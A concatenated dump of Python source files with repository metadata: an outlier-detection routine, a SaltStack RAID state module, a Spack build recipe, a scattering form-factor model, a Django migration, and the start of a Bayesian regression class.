            )

    # No candidate was significant: count is 0, but the candidate lists are
    # still returned so callers can inspect the low-confidence values.
    return GesdResult(
        0,
        potential_outlier_indices,
        test_statistics,
        critical_values,
        all_z_scores[potential_outlier_indices] if potential_outlier_indices else [],
    )
| 34.473118 | 100 | 0.629757 |
import collections
from typing import List
import numpy as np
import numpy.ma as ma
import structlog
from scipy.stats import t
LOG = structlog.get_logger()
GesdResult = collections.namedtuple(
"GesdResult",
["count", "suspicious_indexes", "test_statistics", "critical_values", "all_z_scores"],
)
def gesd(
data: List[float], max_outliers: int = 10, significance_level: float = 0.05, mad: bool = False
) -> GesdResult:
if data is None or np.size(data) == 0:
raise ValueError("No Data ({})".format(data))
length = len(data)
if max_outliers < 1:
raise ValueError(
"max_outliers({max_outliers}) must be >= 1".format(max_outliers=max_outliers)
)
if max_outliers >= len(data):
raise ValueError(
"max_outliers({max_outliers}) <= length({length})".format(
length=len(data) if data is not None else None, max_outliers=max_outliers
)
)
if significance_level <= 0.0 or significance_level >= 1.0:
raise ValueError(
"invalid significance_level({significance_level})".format(
significance_level=significance_level
)
)
series = ma.array(data)
test_statistics = []
critical_values = []
potential_outlier_indices = []
m_outliers = min(max_outliers, length - 1)
indexes = np.arange(m_outliers, dtype=int)
for i in indexes:
LOG.debug("iteration", i=i, mad=mad, series=series)
if mad:
center = np.ma.median(series)
sigma = 1.4826 * np.ma.median(np.fabs(series - center))
else:
center = series.mean()
sigma = series.std(ddof=1)
if sigma == 0:
break
z_scores = (series - center) / sigma
if i == 0:
all_z_scores = (series - center) / sigma
LOG.debug("calculate", z_scores=np.array([np.arange(length, dtype=int), z_scores]).T)
max_z_score_index = np.fabs(z_scores).argmax()
max_z_score = z_scores[max_z_score_index]
significance_result = 1.0 - significance_level / (2.0 * (length - i))
percentage_point = t.ppf(significance_result, df=length - i - 2)
value = (
(length - i - 1)
* percentage_point
/ np.sqrt((length - i - 2 + percentage_point ** 2) * (length - i))
)
potential_outlier_indices.append(max_z_score_index)
test_statistics.append(max_z_score)
critical_values.append(value)
LOG.debug(
"iteration complete",
z_scores=np.array(
[
np.arange(max_outliers, dtype=int),
test_statistics,
critical_values,
np.greater(test_statistics, critical_values),
]
).T,
)
series[max_z_score_index] = ma.masked
LOG.debug("values calculated", max_z_scores=test_statistics, lambda_values=critical_values)
if potential_outlier_indices:
for number_outliers in range(len(potential_outlier_indices), 0, -1):
if np.abs(test_statistics[number_outliers - 1]) > critical_values[number_outliers - 1]:
LOG.debug(
"outliers discovered",
number_outliers=number_outliers,
outliers=potential_outlier_indices[0:number_outliers],
)
return GesdResult(
number_outliers,
potential_outlier_indices,
test_statistics,
critical_values,
all_z_scores[potential_outlier_indices],
)
return GesdResult(
0,
potential_outlier_indices,
test_statistics,
critical_values,
all_z_scores[potential_outlier_indices] if potential_outlier_indices else [],
)
| true | true |
f7327283137a8089ad6e5e8c1b25b9b0b020b6c1 | 3,502 | py | Python | salt/states/mdadm.py | skrobul/salt | ef7fb71082cce7a9783e00b9c65062fefae09263 | [
"Apache-2.0"
] | 1 | 2018-02-03T17:30:56.000Z | 2018-02-03T17:30:56.000Z | salt/states/mdadm.py | skrobul/salt | ef7fb71082cce7a9783e00b9c65062fefae09263 | [
"Apache-2.0"
] | null | null | null | salt/states/mdadm.py | skrobul/salt | ef7fb71082cce7a9783e00b9c65062fefae09263 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Managing software RAID with mdadm
==================================
A state module for creating or destroying software RAID devices.
.. code-block:: yaml
/dev/md0:
raid.present:
- opts: level=1 chunk=256 raid-devices=2 /dev/xvdd /dev/xvde
'''
# Import python libs
import logging
# Import salt libs
import salt.utils
# Set up logger
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'raid'
def __virtual__():
    '''
    mdadm provides raid functions for Linux
    '''
    # Only load this state module on Linux hosts that actually have the
    # mdadm binary available on the PATH.
    is_linux = __grains__['kernel'] == 'Linux'
    has_mdadm = salt.utils.which('mdadm')
    if is_linux and has_mdadm:
        return __virtualname__
    return False
def present(name, opts=None):
    '''
    Verify that the raid is present

    name
        The name of raid device to be created

    opts
        The mdadm options to use to create the raid. See
        :mod:`mdadm <salt.modules.mdadm>` for more information.
        Opts can be expressed as a single string of options.

        .. code-block:: yaml

            /dev/md0:
              raid.present:
                - opts: level=1 chunk=256 raid-devices=2 /dev/xvdd /dev/xvde

        Or as a list of options.

        .. code-block:: yaml

            /dev/md0:
              raid.present:
                - opts:
                  - level=1
                  - chunk=256
                  - raid-devices=2
                  - /dev/xvdd
                  - /dev/xvde
    '''
    ret = {'changes': {},
           'comment': '',
           'name': name,
           'result': True}

    args = [name]
    # ``opts`` may be a single whitespace-separated string, a list, or
    # omitted entirely.  The previous code passed ``None`` straight to
    # ``args.extend()`` when no opts were supplied, raising a TypeError.
    if opts is None:
        opts = []
    elif isinstance(opts, str):
        opts = opts.split()
    args.extend(opts)

    # Device exists: nothing to do.
    if __salt__['raid.list']().get(name):
        ret['comment'] = 'Raid {0} already present'.format(name)
        return ret

    # If running with test use the test_mode with create so the execution
    # module reports what it *would* do without touching any devices.
    if __opts__['test']:
        args.extend(['test_mode=True'])
        res = __salt__['raid.create'](*args)
        ret['comment'] = 'Raid will be created with: {0}'.format(res)
        ret['result'] = None
        return ret

    # Attempt to create the array for real, then re-list to confirm.
    __salt__['raid.create'](*args)

    changes = __salt__['raid.list']().get(name)
    if changes:
        ret['comment'] = 'Raid {0} created.'.format(name)
        ret['changes'] = changes
        # Persist the new array into the mdadm config file.
        __salt__['raid.save_config']()
    else:
        ret['comment'] = 'Raid {0} failed to be created.'.format(name)
        ret['result'] = False
    return ret
def absent(name):
    '''
    Verify that the raid is absent

    name
        The name of raid device to be destroyed

    .. code-block:: yaml

        /dev/md0:
          raid:
            - absent
    '''
    ret = {'changes': {},
           'comment': '',
           'name': name,
           'result': True}

    # Nothing to do when the array is not known to mdadm.
    if name not in __salt__['raid.list']():
        ret['comment'] = 'Raid {0} already absent'.format(name)
        return ret

    # Dry run: report the pending destruction without touching the device.
    if __opts__['test']:
        ret['comment'] = 'Raid {0} is set to be destroyed'.format(name)
        ret['result'] = None
        return ret

    # Attempt to destroy the array and report the outcome.
    destroyed = __salt__['raid.destroy'](name)
    ret['result'] = destroyed
    if destroyed:
        ret['comment'] = 'Raid {0} has been destroyed'.format(name)
    else:
        ret['comment'] = 'Raid {0} failed to be destroyed'.format(name)
    return ret
| 23.823129 | 76 | 0.540548 |
import logging
import salt.utils
log = logging.getLogger(__name__)
__virtualname__ = 'raid'
def __virtual__():
if __grains__['kernel'] != 'Linux':
return False
if not salt.utils.which('mdadm'):
return False
return __virtualname__
def present(name, opts=None):
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
args = [name]
if isinstance(opts, str):
opts = opts.split()
args.extend(opts)
# Device exists
raids = __salt__['raid.list']()
if raids.get(name):
ret['comment'] = 'Raid {0} already present'.format(name)
return ret
# If running with test use the test_mode with create
if __opts__['test']:
args.extend(['test_mode=True'])
res = __salt__['raid.create'](*args)
ret['comment'] = 'Raid will be created with: {0}'.format(res)
ret['result'] = None
return ret
# Attempt to create the array
__salt__['raid.create'](*args)
raids = __salt__['raid.list']()
changes = raids.get(name)
if changes:
ret['comment'] = 'Raid {0} created.'.format(name)
ret['changes'] = changes
# Saving config
__salt__['raid.save_config']()
else:
ret['comment'] = 'Raid {0} failed to be created.'.format(name)
ret['result'] = False
return ret
def absent(name):
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
# Raid does not exist
if name not in __salt__['raid.list']():
ret['comment'] = 'Raid {0} already absent'.format(name)
return ret
elif __opts__['test']:
ret['comment'] = 'Raid {0} is set to be destroyed'.format(name)
ret['result'] = None
return ret
else:
# Attempt to destroy raid
ret['result'] = __salt__['raid.destroy'](name)
if ret['result']:
ret['comment'] = 'Raid {0} has been destroyed'.format(name)
else:
ret['comment'] = 'Raid {0} failed to be destroyed'.format(name)
return ret
| true | true |
f73274ca464f6c55696bccac5f5bb1b094e363e5 | 2,916 | py | Python | var/spack/repos/builtin/packages/eospac/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2021-02-22T18:04:31.000Z | 2021-02-22T18:04:31.000Z | var/spack/repos/builtin/packages/eospac/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-04-24T13:30:08.000Z | 2020-04-24T13:40:08.000Z | var/spack/repos/builtin/packages/eospac/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-03-06T11:04:37.000Z | 2020-03-06T11:04:37.000Z | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Eospac(Package):
    """A collection of C routines that can be used to access the Sesame data
    library.
    """

    homepage = "http://laws.lanl.gov/projects/data/eos.html"
    list_url = "http://laws.lanl.gov/projects/data/eos/eospacReleases.php"

    # Tarballs are served through a PHP download script rather than as plain
    # files, so every version carries an explicit per-version ``url``.
    version('6.4.0', sha256='15a953beac735c68431afe86ffe33323d540d0fbbbec03ba79438dd29736051d',
            url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0_612ea8c9b8ffa6d9175d9118955571d9107f1e3c.tgz")
    version('6.4.0beta.4', sha256='0ebfd8badff575ea77444aa978629dbdca3135a0b5eb373b8daba058773d4635',
            url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.4_aff6429bb6868de31a980278bafa13487c2ce83f.tgz")
    version('6.4.0beta.3', sha256='9f387ca5356519494c6f3f27adb0c165cf9f9e15e3355a67bf940a4a92eebdab',
            url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.3_90ff265f62aa1780bfcd0a62dad807b6be6ed461.tgz")
    version('6.4.0beta.2', sha256='f9db46cd6c62a6f83960d802350f3e37675921af102969b293c02eb797558a53',
            url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.2_69196eadbc77506561eef711f19d2f03b4ab0ffa.tgz")
    version('6.4.0beta.1', sha256='14c5c804e5f628f41e8ed80bcee5a80adeb6c6f3d130715421ca99a30c7eb7e2',
            url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.1_r20171213193219.tgz")
    # ``preferred=True`` makes Spack concretize to 6.3.1 instead of the newer
    # 6.4.0 releases unless a version is requested explicitly.
    version('6.3.1', sha256='aa1112c4251c9c3c2883a7ab2c7f2abff2c339f29dbbf8421ef88b0c9df904f8', preferred=True,
            url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.3.1_r20161202150449.tgz")

    # This patch allows the use of spack's compile wrapper 'flang'
    patch('flang.patch', when='@:6.4.0beta.2%clang')

    def install(self, spec, prefix):
        # The build lives under Source/ and is driven by plain Makefiles;
        # pass the Spack compiler wrappers and all install locations on the
        # make command line.
        with working_dir('Source'):
            make('install',
                 'CC={0}'.format(spack_cc),
                 'CXX={0}'.format(spack_cxx),
                 'F77={0}'.format(spack_f77),
                 'F90={0}'.format(spack_fc),
                 'prefix={0}'.format(prefix),
                 'INSTALLED_LIBRARY_DIR={0}'.format(prefix.lib),
                 'INSTALLED_INCLUDE_DIR={0}'.format(prefix.include),
                 'INSTALLED_EXAMPLE_DIR={0}'.format(prefix.example),
                 'INSTALLED_BIN_DIR={0}'.format(prefix.bin))

        # fix conflict with linux's getopt for 6.4.0beta.2
        if spec.satisfies('@6.4.0beta.2'):
            with working_dir(prefix.bin):
                move('getopt', 'driver_getopt')
| 57.176471 | 159 | 0.698903 |
from spack import *
class Eospac(Package):
homepage = "http://laws.lanl.gov/projects/data/eos.html"
list_url = "http://laws.lanl.gov/projects/data/eos/eospacReleases.php"
version('6.4.0', sha256='15a953beac735c68431afe86ffe33323d540d0fbbbec03ba79438dd29736051d',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0_612ea8c9b8ffa6d9175d9118955571d9107f1e3c.tgz")
version('6.4.0beta.4', sha256='0ebfd8badff575ea77444aa978629dbdca3135a0b5eb373b8daba058773d4635',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.4_aff6429bb6868de31a980278bafa13487c2ce83f.tgz")
version('6.4.0beta.3', sha256='9f387ca5356519494c6f3f27adb0c165cf9f9e15e3355a67bf940a4a92eebdab',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.3_90ff265f62aa1780bfcd0a62dad807b6be6ed461.tgz")
version('6.4.0beta.2', sha256='f9db46cd6c62a6f83960d802350f3e37675921af102969b293c02eb797558a53',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.2_69196eadbc77506561eef711f19d2f03b4ab0ffa.tgz")
version('6.4.0beta.1', sha256='14c5c804e5f628f41e8ed80bcee5a80adeb6c6f3d130715421ca99a30c7eb7e2',
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.4.0beta.1_r20171213193219.tgz")
version('6.3.1', sha256='aa1112c4251c9c3c2883a7ab2c7f2abff2c339f29dbbf8421ef88b0c9df904f8', preferred=True,
url="http://laws.lanl.gov/projects/data/eos/get_file.php?package=eospac&filename=eospac_v6.3.1_r20161202150449.tgz")
patch('flang.patch', when='@:6.4.0beta.2%clang')
def install(self, spec, prefix):
with working_dir('Source'):
make('install',
'CC={0}'.format(spack_cc),
'CXX={0}'.format(spack_cxx),
'F77={0}'.format(spack_f77),
'F90={0}'.format(spack_fc),
'prefix={0}'.format(prefix),
'INSTALLED_LIBRARY_DIR={0}'.format(prefix.lib),
'INSTALLED_INCLUDE_DIR={0}'.format(prefix.include),
'INSTALLED_EXAMPLE_DIR={0}'.format(prefix.example),
'INSTALLED_BIN_DIR={0}'.format(prefix.bin))
# fix conflict with linux's getopt for 6.4.0beta.2
if spec.satisfies('@6.4.0beta.2'):
with working_dir(prefix.bin):
move('getopt', 'driver_getopt')
| true | true |
f73274e98631a7c59fbcf53f1b533864bc4b4c67 | 6,295 | py | Python | Functions/FormFactors/SphericalShell_expDecay.py | prjemian/XAnoS | 8a70380a88421042feff6f4aa9f5cf1f79ab4efc | [
"MIT"
] | null | null | null | Functions/FormFactors/SphericalShell_expDecay.py | prjemian/XAnoS | 8a70380a88421042feff6f4aa9f5cf1f79ab4efc | [
"MIT"
] | null | null | null | Functions/FormFactors/SphericalShell_expDecay.py | prjemian/XAnoS | 8a70380a88421042feff6f4aa9f5cf1f79ab4efc | [
"MIT"
] | null | null | null | ####Please do not remove lines below####
from lmfit import Parameters
import numpy as np
import sys
import os
sys.path.append(os.path.abspath('.'))
sys.path.append(os.path.abspath('./Functions'))
sys.path.append(os.path.abspath('./Fortran_rountines'))
####Please do not remove lines above####
####Import your modules below if needed####
from xraydb import XrayDB
#from pyEQL import chemical_formula
class SphericalShell_expDecay: #Please put the class name same as the function name
    """Small-angle scattering form factor of a spherical particle surrounded
    by a Stern layer of condensed ions and an exponentially decaying diffuse
    ion layer (see :meth:`solrho` for the radial density model).
    """
    # Physical constants shared by all instances.
    No = 6.023e23 # Avagadro number
    re2= (2.817e-5)**2 # Square of classical electron radius in Angs^2
    def __init__(self, x=0, rmin=0.0, rmax=30.0, Nr=31, Rc=10.0, strho=1.0, tst=2.0, lrho=0.5, lexp=10.0, rhosol=0.0, norm=1.0, bkg=0.0, mpar={}):
        """
        Form factor of a spherical shell with an exponentially decaying ion layer.

        x      : independent variable (q values) in the form of a scalar or an array
        rmin   : smallest radial distance (Angstroms) of the density grid used in :meth:`y`
        rmax   : largest radial distance (Angstroms) of the density grid used in :meth:`y`
        Nr     : number of points in the radial grid
        Rc     : Radial distance in Angstroms after which the solvent contribution starts
        strho  : Concentration of the ions of interest in the stern layer in Molar
        tst    : Thickness of stern layer in Angstroms
        lrho   : The maximum concentration of the diffuse layer in Molars
        lexp   : The decay length of the diffuse layer assuming exponential decay
        rhosol : The surrounding bulk density
        norm   : Density of particles in Moles/Liter
        bkg    : Constant background
        mpar   : multivalued fitting parameters (none for this model)
        """
        # NOTE(review): mutable default ``mpar={}`` is shared across calls —
        # confirm that no caller mutates it.
        if type(x)==list:
            self.x=np.array(x)
        else:
            self.x=x
        self.rmin=rmin
        self.rmax=rmax
        self.Nr=Nr
        self.Rc=Rc
        self.strho=strho
        self.tst=tst
        self.lrho=lrho
        self.lexp=lexp
        self.rhosol=rhosol
        self.norm=norm
        self.bkg=bkg
        self.__mpar__=mpar #If there is any multivalued parameter
        self.choices={} #If there are choices available for any fixed parameters
        self.__xrdb__=XrayDB()
        self.init_params()

    def init_params(self):
        """
        Define all the fitting parameters like
        self.param.add('sig',value=0,vary=0)
        """
        # All parameters start fixed (vary=0); the fitting GUI/driver is
        # expected to toggle ``vary`` as needed.
        self.params=Parameters()
        self.params.add('Rc',value=self.Rc,vary=0,min=-np.inf,max=np.inf,expr=None,brute_step=0.1)
        self.params.add('strho', value=self.strho, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
        self.params.add('tst', value=self.tst, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
        self.params.add('lrho', value=self.lrho, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
        self.params.add('lexp', value=self.lexp, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
        self.params.add('norm', value=self.norm, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
        self.params.add('bkg', value=self.bkg, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)

    def solrho(self, r, Rp=100.0, Rc=12.5, strho=1.0, tst=2.0, lrho=0.5, lexp=10.0, rhosol=0.0):
        """
        Calculates the electron density for the distribution of ions as a function of radial distance surrounding a spherical particle

        Rp     :: Radius of the sphere in Angstroms enclosing the spherical particle
        Rc     :: Radial distance in Angstroms after which the solvent contribution starts
        strho  :: Concentration of the ions of interest in the stern layer in Molar
        tst    :: Thickness of stern layer in Angstroms
        lrho   :: The maximum concentration of the diffuse layer in Molars
        lexp   :: The decay length of the diffuse layer assuming exponential decay
        rhosol :: The surrounding bulk density

        NOTE(review): reads ``self.output_params``, which is only created in
        :meth:`y`; calling ``solrho`` standalone before ``y`` raises
        AttributeError.
        """
        # Stern layer occupies (R1, R2]; diffuse layer lies beyond R2.
        R1=Rc
        R2=Rc+tst
        #integral=np.sum([r1**2*np.exp(-(r1-R2)/lexp) for r1 in np.linspace(R2,Rp,1001)])*(Rp,R2 numerical check kept below)
        #integral=np.sum([r1**2*np.exp(-(r1-R2)/lexp) for r1 in np.linspace(R2,Rp,1001)])*(Rp-R2)/1000
        # Closed form of Integral[r^2 exp(-r/lexp), {r, R2, Rp}]; combined with
        # the exp(R2/lexp) factor below it equals the numerical sum in the
        # commented-out line above.
        integral=lexp*(R2**2*np.exp(-R2/lexp)-Rp**2*np.exp(-Rp/lexp))+2*lexp**2*(R2*np.exp(-R2/lexp)-Rp*np.exp(-Rp/lexp))+2*lexp**3*(np.exp(-Rp/lexp)-np.exp(-R2/lexp))
        # Offset density of the diffuse layer chosen so the r^3-weighted totals
        # over [R1, Rp] balance the bulk value rhosol after subtracting the
        # Stern and exponential contributions.
        rhos=(rhosol*(Rp**3-R1**3)-strho*(R2**3-R1**3)-3*lrho*integral*np.exp(R2/lexp))/(Rp**3-R2**3)
        self.output_params['scaler_parameters']['rho_bulk']=rhos
        # Piecewise profile: constant strho on (R1, R2], exponential decay plus
        # the rhos offset for r > R2, zero inside R1.
        stern = np.where(r > R1, strho, 0.0) * np.where(r > R2, 0.0, 1.0)
        diffuse = np.where(r > R2, lrho * np.exp(-(r - R2) / lexp) + rhos, 0.0)
        rho = (stern + diffuse)
        return rho # in Moles/Liter

    def calc_form(self, q, r, rho):
        """
        Calculates the isotropic form factor using the isotropic electron density as a funciton of radial distance

        q   :: scaler or array of reciprocal reciprocal wave vector in inv. Angstroms at which the form factor needs to be calculated in
        r   :: array of radial distances at which the element/ion density in known in Angstroms
        rho :: array of element/ion densities as a function of radial distance in el/Angstroms^3. Note: The electron density should decay to zero at the last radial distance
        """
        dr = r[1] - r[0]
        form = np.zeros_like(q)
        # Subtract the value at the largest radius so the profile decays to
        # zero, then convert from Moles/Liter (1 L = 1e27 Angs^3).
        rho = (rho - rho[-1])* self.No/1e27 #converting it to moles/Angs^3
        # Riemann sum of the spherically symmetric Fourier transform:
        # 4*pi*r^2*rho*sin(q r)/(q r) integrated over r.
        for r1, rho1 in zip(r, rho):
            form = form + 4 * np.pi * r1 * rho1 * np.sin(q * r1) / q
        form = (np.absolute(form) * dr)**2
        return self.re2 * form * 1e-16 * self.No / 1e3 # in cm^-1

    def y(self):
        """
        Evaluate the model intensity at ``self.x`` using the current fit
        parameters; also populates ``self.output_params`` with the radial
        electron-density profile and derived scalars.
        """
        self.output_params={}
        self.output_params['scaler_parameters']={}
        r=np.linspace(self.rmin, self.rmax, self.Nr)
        strho=self.params['strho'].value
        tst=self.params['tst'].value
        lrho=self.params['lrho'].value
        lexp=self.params['lexp'].value
        #rhosol=self.params['rhosol'].value
        norm=self.params['norm'].value
        bkg=self.params['bkg'].value
        Rc = self.params['Rc'].value
        # Radius (Angstroms) of the volume available per particle at number
        # density norm (Moles/Liter); 1 L = 1e27 Angs^3, hence the 1e9 factor.
        Rp=(3/(4*np.pi*norm*6.022e23))**(1.0/3.0)*1e9
        rho=self.solrho(r, Rp=Rp, Rc=Rc, strho=strho, tst=tst, lrho=lrho, lexp=lexp, rhosol=self.rhosol)
        self.output_params['Electron_Density']={'x':r,'y':rho}
        self.output_params['scaler_parameters']['Rp']=Rp
        form=norm*self.calc_form(self.x,r,rho)+bkg
        return form
if __name__=='__main__':
    # Quick smoke test: evaluate the form factor on a coarse q-grid and print.
    x=np.arange(0.001,1.0,0.1)
    fun=SphericalShell_expDecay(x=x)
    print(fun.y())
| 46.62963 | 177 | 0.624305 | os.path.abspath('./Functions'))
sys.path.append(os.path.abspath('./Fortran_rountines'))
if type(x)==list:
self.x=np.array(x)
else:
self.x=x
self.rmin=rmin
self.rmax=rmax
self.Nr=Nr
self.Rc=Rc
self.strho=strho
self.tst=tst
self.lrho=lrho
self.lexp=lexp
self.rhosol=rhosol
self.norm=norm
self.bkg=bkg
self.__mpar__=mpar
self.choices={}
self.__xrdb__=XrayDB()
self.init_params()
def init_params(self):
self.params=Parameters()
self.params.add('Rc',value=self.Rc,vary=0,min=-np.inf,max=np.inf,expr=None,brute_step=0.1)
self.params.add('strho', value=self.strho, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('tst', value=self.tst, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('lrho', value=self.lrho, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('lexp', value=self.lexp, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('norm', value=self.norm, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
self.params.add('bkg', value=self.bkg, vary=0, min=-np.inf, max=np.inf, expr=None, brute_step=0.1)
def solrho(self, r, Rp=100.0, Rc=12.5, strho=1.0, tst=2.0, lrho=0.5, lexp=10.0, rhosol=0.0):
R1=Rc
R2=Rc+tst
integral=lexp*(R2**2*np.exp(-R2/lexp)-Rp**2*np.exp(-Rp/lexp))+2*lexp**2*(R2*np.exp(-R2/lexp)-Rp*np.exp(-Rp/lexp))+2*lexp**3*(np.exp(-Rp/lexp)-np.exp(-R2/lexp))
rhos=(rhosol*(Rp**3-R1**3)-strho*(R2**3-R1**3)-3*lrho*integral*np.exp(R2/lexp))/(Rp**3-R2**3)
self.output_params['scaler_parameters']['rho_bulk']=rhos
stern = np.where(r > R1, strho, 0.0) * np.where(r > R2, 0.0, 1.0)
diffuse = np.where(r > R2, lrho * np.exp(-(r - R2) / lexp) + rhos, 0.0)
rho = (stern + diffuse)
return rho
def calc_form(self, q, r, rho):
dr = r[1] - r[0]
form = np.zeros_like(q)
rho = (rho - rho[-1])* self.No/1e27
for r1, rho1 in zip(r, rho):
form = form + 4 * np.pi * r1 * rho1 * np.sin(q * r1) / q
form = (np.absolute(form) * dr)**2
return self.re2 * form * 1e-16 * self.No / 1e3
def y(self):
self.output_params={}
self.output_params['scaler_parameters']={}
r=np.linspace(self.rmin, self.rmax, self.Nr)
strho=self.params['strho'].value
tst=self.params['tst'].value
lrho=self.params['lrho'].value
lexp=self.params['lexp'].value
norm=self.params['norm'].value
bkg=self.params['bkg'].value
Rc = self.params['Rc'].value
Rp=(3/(4*np.pi*norm*6.022e23))**(1.0/3.0)*1e9
rho=self.solrho(r, Rp=Rp, Rc=Rc, strho=strho, tst=tst, lrho=lrho, lexp=lexp, rhosol=self.rhosol)
self.output_params['Electron_Density']={'x':r,'y':rho}
self.output_params['scaler_parameters']['Rp']=Rp
form=norm*self.calc_form(self.x,r,rho)+bkg
return form
if __name__=='__main__':
x=np.arange(0.001,1.0,0.1)
fun=SphericalShell_expDecay(x=x)
print(fun.y())
| true | true |
f7327574c3e9432aac029aee865c8a55bab5ede4 | 282 | py | Python | hexa/core/migrations/0008_ci_text.py | qgerome/openhexa-app | 8c9377b2ad972121d8e9575f5d52420212b52ed4 | [
"MIT"
] | 4 | 2021-07-19T12:53:21.000Z | 2022-01-26T17:45:02.000Z | hexa/core/migrations/0008_ci_text.py | qgerome/openhexa-app | 8c9377b2ad972121d8e9575f5d52420212b52ed4 | [
"MIT"
] | 20 | 2021-05-17T12:27:06.000Z | 2022-03-30T11:35:26.000Z | hexa/core/migrations/0008_ci_text.py | qgerome/openhexa-app | 8c9377b2ad972121d8e9575f5d52420212b52ed4 | [
"MIT"
] | 2 | 2021-09-07T04:19:59.000Z | 2022-02-08T15:33:29.000Z | # Generated by Django 4.0 on 2022-01-10 15:42
from django.contrib.postgres.operations import CITextExtension
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("core", "0007_ltree"),
]
operations = [CITextExtension()]
| 20.142857 | 62 | 0.712766 |
from django.contrib.postgres.operations import CITextExtension
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("core", "0007_ltree"),
]
operations = [CITextExtension()]
| true | true |
f7327641ba028e0a7583ec0d94fadffc14edd2ba | 3,143 | py | Python | prml/linear/_bayesian_regression.py | alexandru-dinu/PRML | acd823e098df67abe0306a70225e7539f8edda40 | [
"MIT"
] | null | null | null | prml/linear/_bayesian_regression.py | alexandru-dinu/PRML | acd823e098df67abe0306a70225e7539f8edda40 | [
"MIT"
] | null | null | null | prml/linear/_bayesian_regression.py | alexandru-dinu/PRML | acd823e098df67abe0306a70225e7539f8edda40 | [
"MIT"
] | 1 | 2019-06-22T20:56:02.000Z | 2019-06-22T20:56:02.000Z | import numpy as np
from prml.linear._regression import Regression
class BayesianRegression(Regression):
    """Bayesian regression model.

    w ~ N(w|0, alpha^(-1)I)
    y = X @ w
    t ~ N(t|X @ w, beta^(-1))
    """

    def __init__(self, alpha: float = 1.0, beta: float = 1.0):
        """Initialize bayesian linear regression model.

        Parameters
        ----------
        alpha : float, optional
            Precision parameter of the prior, by default 1.
        beta : float, optional
            Precision parameter of the likelihood, by default 1.
        """
        self.alpha = alpha
        self.beta = beta
        # Posterior moments; stay None until ``fit`` is called.
        self.w_mean = None
        self.w_precision = None

    def _is_prior_defined(self) -> bool:
        # The prior is considered known once both moments have been set,
        # e.g. by an earlier call to ``fit``.
        return not (self.w_mean is None or self.w_precision is None)

    def _get_prior(self, ndim: int) -> tuple:
        # Fall back to the isotropic zero-mean prior N(0, alpha^-1 I)
        # when no posterior from a previous fit is available.
        if not self._is_prior_defined():
            return np.zeros(ndim), self.alpha * np.eye(ndim)
        return self.w_mean, self.w_precision

    def fit(self, x_train: np.ndarray, y_train: np.ndarray):
        """Bayesian update of the weight posterior given a training set.

        Parameters
        ----------
        x_train : np.ndarray
            training data independent variable (N, n_features)
        y_train : np.ndarray
            training data dependent variable
        """
        ndim = np.size(x_train, 1)
        prior_mean, prior_precision = self._get_prior(ndim)
        # Conjugate Gaussian update:
        #   S_N^-1 = S_0^-1 + beta X^T X
        #   m_N    = S_N (S_0^-1 m_0 + beta X^T t)
        posterior_precision = prior_precision + self.beta * x_train.T @ x_train
        rhs = prior_precision @ prior_mean + self.beta * x_train.T @ y_train
        posterior_mean = np.linalg.solve(posterior_precision, rhs)
        self.w_mean = posterior_mean
        self.w_precision = posterior_precision
        self.w_cov = np.linalg.inv(self.w_precision)

    def predict(
        self,
        x: np.ndarray,
        return_std: bool = False,
        sample_size: int = None,
    ):
        """Return mean (and standard deviation) of the predictive distribution.

        Parameters
        ----------
        x : np.ndarray
            independent variable (N, n_features)
        return_std : bool, optional
            flag to return standard deviation (the default is False)
        sample_size : int, optional
            number of samples to draw from the predictive distribution
            (the default is None, no sampling from the distribution)

        Returns
        -------
        y : np.ndarray
            mean of the predictive distribution (N,)
        y_std : np.ndarray
            standard deviation of the predictive distribution (N,)
        y_sample : np.ndarray
            samples from the predictive distribution (N, sample_size)
        """
        # Monte-Carlo mode: draw weight vectors from the posterior and
        # project them through the design matrix.
        if sample_size is not None:
            drawn_weights = np.random.multivariate_normal(
                self.w_mean,
